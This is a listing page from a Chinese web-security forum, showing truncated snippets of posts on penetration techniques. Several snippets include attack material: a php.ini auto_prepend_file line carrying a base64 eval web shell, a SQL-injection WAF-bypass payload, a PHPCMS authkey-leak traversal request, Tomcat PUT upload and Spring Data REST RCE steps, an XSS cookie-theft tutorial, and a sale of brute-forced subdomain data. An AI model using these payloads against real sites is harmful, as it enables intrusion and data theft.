诚殷网络WEB安全技术论坛—WEB安全培训|渗透测试培训|网络安全培训|黑客论坛|白帽子论坛|黑客论坛|
网站安全-思路
网站安全-思路

网站安全-思路

今日: 0 主题: 574
回复

15

抱歉,写的可能有些长,然后有的没写好,这里只是概述。希望能带给大家的启示。有感而发,全网第一篇,包括我们论坛都没有。 起 源 在那年还在读初三的我,就一直非常迷恋黑客,看过什么黑客的小说,黑 ...
root 4 天前
405
回复

4

为了防止报道贴过溢, 新人可以在此振臂呼,我XXOO在诚殷网络平台注册...(此处省略若干字)(仅一次) 这里是来交流的。 能百度谷歌的就别bb了,不懂可以问。
00sec 2017-5-5
351
回复

0

当使用nginx标准模块时,攻击者可以通过发送包含恶意构造 range 域的 header 请求,来获取响应中的缓存文件头部信息。在某些配置中,缓存文件头可能包含后端服务器的IP地址或其它敏感信息,从而导致信息泄露。 影响 ...
skeleton 4 天前
110
回复

0

首先我们需要一个XSS平台。(xss.chengyin.org) (目前XSS基本都用的xssme这个源码所以操作上面基本相同) 创建项目(意思就是创建一个XSS接受器) 这里随便写 这里选择的模块,就是以后用来 ...
root 4 天前
138
回复

0

范围:Apache Tomcat 7.0.0 - 7.0.81 第一步:修改conf/web.xml文件 原先:↓ 添加readonly为false:↓ 第二步:BURP 2-1、PUT提交方式创建test1.jsp文件,内容为test,用%20 BYPASS 2-2、PUT提交方式创 ...
skeleton 5 天前
101
回复

0

该IP为本人最近搭建的靶场,若想自己测试能否复现,请留言。 漏洞触发条件:网站使用Spring Data REST提供REST Web服务,版本在受影响范围内。 利用POST请求添加一个数据执行命令命令详细在附件里EXP执行结果:↓
skeleton 5 天前
97
回复

0

这个有意思,加了图形验证码。 但是这里程序员犯了一个错误,只验证图形验证码,却没有对时间进行验证,也就是说程序员的思维是只要图形验证码正确就允许重新发送验证码,这样从而就实现了绕过时间验证达到对 ...
sky666 6 天前
120
回复

3

这个站比较特别,主站和旁站都在一台服务器上,所以waf对主站和旁站都有作用。另外提示这是安全狗。 以后看到这个可以知道一般都是安全狗。 接下来就是我与waf的对抗之路 我开始是写进去了 ...
sky666 7 天前
130
回复

4

也感觉只有这里、只有黑无常大佬才会不嫌弃我的一些渣渣思路,以后打算有我感觉不错的思路就发一下,做个分享也顺便做个记录。 开始测试我无意中看到我们湖南又要举办湖湘杯,网络安全技能大赛,我心想这不错啊 ...
sky666 7 天前
92
回复

0

利用起来略显鸡肋。首先满足以下条件: 第一条:有管理员联系方式 第二条:存在友情链接申请(/plus/fink_add.php) 第三条:需要一台外网服务器(虚拟机啊啥的都可以,能让人访问的!) 首先我们需要将 ...
root 2017-11-14
4
回复

0

爆出authkey的方式!第一种:[mw_shl_code=html,true]/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&pa ...
root 2017-11-13
163
回复

5

事情是这样滴,浏览某个贴吧,然后遇到这样的帖子: xxxx寻找渗透大师,拿数据,求合作。 然后我就加上了。开始套路大法。 首先我假装是来接单的,这人一看就没啥技术啊。估计没被骗过!一听到是 ...
root 2017-11-12
742
回复

0

[mw_shl_code=html,true]reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MMC\NodeTypes\{476E6449-AAFF-11D0-B944-00C04FD8D5B0}\Extensions\NameSpace" /v "{1AA7F83A-C7F5-11D0-A376-00C04FC9DA04}" /f[/mw_s ...
root 2017-11-12
73
回复

0

然后搜索disable_ 找到下面这些,替换掉 [mw_shl_code=html,true]disable_functions = popen,phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alte ...
root 2017-11-10
117
回复

6

诚殷网络放大招了!卖血了!忍痛出售珍藏的子域名! (手机版,不可见附件) 我的心好痛! 因为太多我这里也就介绍一下压缩包里面的内容: 爆破所得的子域名+每个子域名的C段+每个子域名的80|8080|7001|80 ...
root 2017-11-10
794
回复

6

首先打开php.ini更改两个参数: [mw_shl_code=html,true]auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8 ...
root 2017-11-4
182
回复

0

and 1=2 UNIOn%0AsELECT-1,2,3,4,database(),6,7,8,9,10,11%23 使用 %0A 进行绕过 (PS:%0A 是换行符)
root 2017-11-1
149
回复

0

WordPress漏洞相当的多,近日又爆出WordPress存在SQL注入漏洞,4.8.3之前所有版本受影响。因其使用量较大,绿盟科技发布威胁通告,通告全文如下:WordPress WPDB SQL注入漏洞威胁预警通告当地时间2017年10月31日,Wo ...
root 2017-11-1
165
回复

0

服务器:Linux 环境:nginx/1.4.7 脚本:PHP Version 7.0.0 上传情况简介: 上传 111.jpg111 确实可以成功的但是上传 1.php.jpg1111.1 失败了?,这个告诉我们,文件名必须包含 jpg 三个字母,且 后缀必须 ...
root 2017-10-31
1036
回复

0

0x01 Payload[mw_shl_code=html,true]GET /typecho/install.php?finish=1 HTTP/1.1 Host: 192.168.211.169 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Ac ...
root 2017-10-26
409
回复

0

很多人在学习手工注入的时候第一句往往学习的是 但是其他他们也有很多人并不知道我们为什么要去 [mw_shl_code=sql,true]order by 1,2,3,4,5,6%23[/mw_ ...
李是小阔爱 2017-10-25
382
下一页 »

QQ|手机版|小黑屋|诚殷网络论坛 ( 琼ICP备15002356号 )

Powered by Dede 123 © 2001-2016 Hacker.

返回顶部